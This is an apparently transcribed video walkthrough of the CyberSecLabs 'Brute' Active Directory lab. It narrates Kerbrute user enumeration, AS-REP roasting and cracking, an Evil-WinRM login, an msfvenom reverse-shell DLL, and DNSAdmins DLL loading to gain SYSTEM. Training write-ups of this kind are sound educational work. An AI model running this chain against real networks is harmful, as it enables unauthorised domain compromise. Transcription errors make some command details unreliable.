Alright, hello everybody, and today we'll be doing Brute from CyberSecLabs, and this is an Active Directory box. So yeah, let's get started. So first we're just going to make sure this box is up, and it is. So let's just start off our nmap scan. We can scan for all ports, and we can also make it verbose. We'll just let that run. You can see I already find some ports, quite standard, so we'll just let that run out. And in the meantime, why won't we just do SMB client? We can list the shares so we can see what's on it. You can see we don't really see anything here. That's fine, we can just keep letting it run. But if you guys are not that good at Active Directory like me, you can come onto here, book.hacktricks.xyz, and you can come over here to, if it loads, where is the Active Directory methodology. And you can just follow this if you want. It can really help you out. So yeah, I'm just gonna let this run our nmap scan, and we'll see what happens. Alright, and the nmap scan is finally finished, so we can just come up over here, take a look at this. So it's pretty standard for an Active Directory room. Kerbrute, Microsoft RPC, we have LDAP, and over here we can see DNS domain name brute.csl, which you should add into your Etsy host file. Just put it in, slap it in at the end, the IP address space, and then the brute.csl. So we have that. We can come down over here and we can take a look at this. We have 5985, so that's Evil-Winrm, Windows Remote Management, and we can possibly log in if we find some credentials. And yeah, so if we come back here, I should say check for no and guest access on SMB services. We already checked and we didn't see any shares. We can also run something like enum for Linux 3133, but it shouldn't give us much. But yeah, and it's done. And as you can see, we don't really get a lot out of it. So yeah. So let's just now take a look, enumerate LDAP. So I guess we could do that. You just copy this. Put the IP address 172.31.33. We'll let that run. And what's next on the list is just poison the network with responder. We're not actually gonna do that because I don't think we'll get anything from that. But let this finish up, and it finished up. So we can take a look at this. Come up over here. We don't exactly see that much stuff that's interesting. We don't really see any users or anything, so why don't we just exit out of that, and we can take a look over here. User enumeration: when an invalid username is requested, the server will respond using Kerbrute's error code, and it's the error code. So yeah, it's gonna test a bunch of usernames and see which ones work. We can use nmap, or we can just use Kerbrute. I'm just gonna use Kerbrute. So if you don't have that, you can just search up Kerbrute, and it should be the first one on GitHub. And once you come over here, kind of slow, you can just come over here to releases and pick which one. Kerbrute, where is it? Linux, AMD 64, this one. So you can just grab that one and download it. I already have it. And you just move that wherever you want. It's in my op folder. Where is it? I have no idea. Kerbrute Linux AMD 64. So you can just do that /Kerbrute Linux AMD 64. And if you come over here, it does give you the command to do. So user enum, and then you can see -d. I guess that's for domain. And we can just do brute.csl. And over here it tells you username.txt, so I guess you have to include some sort of username. So we need a username list. So what can we do for that? We can, if you don't have it, you can do app install SecLists, which is pretty much a bunch of lists. As you can see, I already have it. So, but yeah, so it should be in your user share. I don't know, SecLists. SecLists. Maybe in wordless. I'm not exactly sure where it is, and SecLists. So cd SecLists and usernames. You can head over there, and we have a bunch of usernames over here. I'm just gonna use this one, this 10 million usernames.txt. So we can just do that. User share SecLists usernames, and we just do 0 net 10 million usernames.text. And we didn't have something. What is it? I'm not sure what that is. So let's take a look. Oh, did I forget -d? I think. No. Do I need to include -dc root.csl? Yes. Okay, so that's it. And we already got some usernames: Patrick, Malcolm, Patrick again. I guess that's because of the capital. We also have administrator and Patrick again. So we can start making a list out of this. Maybe we can make directory walkthrough and cd walkthrough. Oops, sorry. I'll just cd walkthrough. And we can start making a users, and we can do Patrick, we can do Malcolm. I'm not going to put administrator in there, but we'll just let that run and see if it finds any other usernames. This list is kind of big, so I don't expect it to go through everything. But we do see tests, and we can wait and see if there's anything else. But yeah, this should run through for a very long time, and I doubt they'll have a username at the bottom of the list. So you can see we get Malcolm again. So yeah, I think this is just these 3 users. So yeah, what can we do now? So if we look back on this hacktricks, it does tell us knowing one or several usernames, we can do asrep roast. If a user doesn't have don't request pre-auth, you can use asrep message for that user that will contain some data encrypted, and you can read more about it if you want. But let's just come in here, and it can tell us what to do. Come on. And see if there's any other users while that loads. And we do see one Darlene. So I guess we'll add that. Darlene. So yeah. And as you can see, there is something here. We can use GetNPUSers.py, so that's part of Impacket. If you don't have that, you can just do pip3 install Impacket, but I already have it. So yeah, why don't we just do getNPUsers.py. You can just auto tab if you already have it. And I guess we'll need to specify a domain. So it's brute.csl. And then, yeah, why don't we just copy this and we'll edit it. Okay, so it'll output the hashes if it gets one into a specific file. We'll do user file, it's just users for us. And I guess there's the domain, which we can just do brute.csl. We'll let that run through it, and domain should be specified. Did we do it wrong? GetNPUsers.py. Take a look. This should work. GetNPUsers and brute.csl. Do we need to specify something? Let's see. We can also do format hashcat John. We're just gonna do John. This should work. I'm not exactly sure what's wrong. Dash users file users, and we can do dash format John, and we can also do the output file thing. Okay, yeah. So user Patrick doesn't have it. Malcolm and Darlene. Is there another user? Oops, what'd I do? Oh boy, I guess I moved it to another window. Yeah, we don't have any other usernames, but I do see one missing because we did have 4 usernames, so maybe it's in here. And yes, we do. We have a hash, so that's awesome. As you can see, we do have a hash here, and that's great. So we can try to crack this hash and maybe get a password out of it. So we can just use John the Ripper for that. We can specify a wordless user share wordless rockU.text, and we can just do hashes.asrep roast, and we'll let that run. And this is loaded 1password hash. So yeah, okay, so the password's unique 1 with the capital U, so it's great. Maybe we can try to do psexec into it, or maybe winrm. So we can try psexec, but yeah, we could try psexec to test unique 1 at 172.31.33, and we'll see if that works or not. As you can see, it doesn't work, but we can try Evil-Winrm at IP address 172.31.33 -username test-p for password unique 1. We should be able to log in with this. And if we look back, I think this is all the usernames, so we can just cancel out of this. Okay, and as you can see, we're here. So that's awesome. We're in the documents right now. And we're logged in. So once we're on here, we can try to upload something like WinPs, or maybe we can even upload something like Bloodhound, because this is Active Directory. But one of the simplest things you can do, maybe do whoami/all, which will show you a lot of information. You tell you what groups you're in, some privileges that you have. So as you can see, we are currently tests, groups, some groups. Nothing too interesting until we come down here. DNSAdmins. So that's interesting. You don't see that a lot. And also we can see privileges. Nothing interesting here. So this is by far the most interesting. And if you don't know anything about this, you can easily just go and Google DNSAdmins. I don't know, privilege escalation. And as you can see, it is a thing on Active Directory. So you could look at this Medium article if you want, or you can just come back on hacktricks and search DNSAdmins, and we'll see if anything shows up. And yeah, something does show up. Privileged account and token privileges. We can take a look at this and see if we can possibly privilege escalate with this. So yeah, this is kind of slow. I'm not sure why. Any minute now. Come on. Okay, and it's done. A user who's the member of DNSAdmins group or have write privileges to a DNS server object can load an arbitrary DLL with system privileges on a DNS server. This is interesting as the domain controllers are used very frequently as DNS servers. Okay, so maybe we can try to edit this and make our own DLL. So yeah, if we want to make our own DLL, we can do something with the Evil-Winrm. Oops, I just clicked on that. So why don't we head over to pentest.ws, and we can head over to Venom Builder, tools, Venom Builder, and okay, so payload, we can just do Windows x64 because it's using x64 architecture. We just do shell reverse TCP. Select that. IP address is correct, L port's correct. Format DLL, out file shell.dll. We can just copy this, slap it onto our walkthrough directory, and we'll see what that gives us. And I don't think this works with Interpret. I tried it before. It said it was too big or something. So yeah, we're using a regular shell, and we can also start up MSF console for multi-handler. So we'll let that run. Come on, see either of them gonna load. We'll let those run. Okay, there we go. So we do have our shell.dll now, and MSF console is starting up. So since we're on Evil-Winrm, we can easily just do upload, kind of similar to what Interpreter can do. So we can just do upload shell.dll. We don't have to provide the full path because we started this in our walkthrough directory, and that's where we put our DLL. Oops. So you just do upload shell.dll, and that should work for us. LS, and you can see it's there. So why don't we start up our multi-handler. So zoom in. We gotta set our payload to Windows x64 shell reverse TCP. We'll set our L port to 1234. We'll set our L host at 10.10.03. So that's our IP address. Show options to make sure everything's correct. And I guess we did do something wrong with the payload. What did we do wrong? I spelled it wrong, obviously. So it's always good to check. So we'll show options again. And yep, the payload's correct. Our L port and our L host is correct. So why don't we just run? So now it's listening on their port, waiting for a connection. And if we come back over here to hacktricks to tell us what to do, we can just do DNSCMD /config server level plugin DLL and this DC computer name. I don't think we'll need that, so we can just try it. /config, and I'll just copy this actually. Copy this, and we'll need the path to our DNS or DLL. Okay, and as for a path to DLL, it's in users test documents shell.dll. It's completed properly, and now if you come down here, we need to start this. We need to stop the service and then start the service. So why don't we? Because we're in PowerShell, I think we need to do sc.exe stop DNS. It looks like we stopped it, and we can try to do scexe start DNS. And as you can see, we did get a command shell, so it's awesome. Who am I? We're NT authority system. Get back out of this, cd users, cd administrator, dir, cd desktop, dir, and that is your system flag right over there. Hope you guys enjoyed this box, and if you guys did enjoy it, please leave a like. I'll be doing some more Active Directory rooms, I hope, since I'm finished with all the beginner labs now. So yeah, it's a big milestone. So yeah, I hope you guys enjoyed this video. If you guys did, please leave a thumbs up again, and until then, I'll see you guys next time. Goodbye.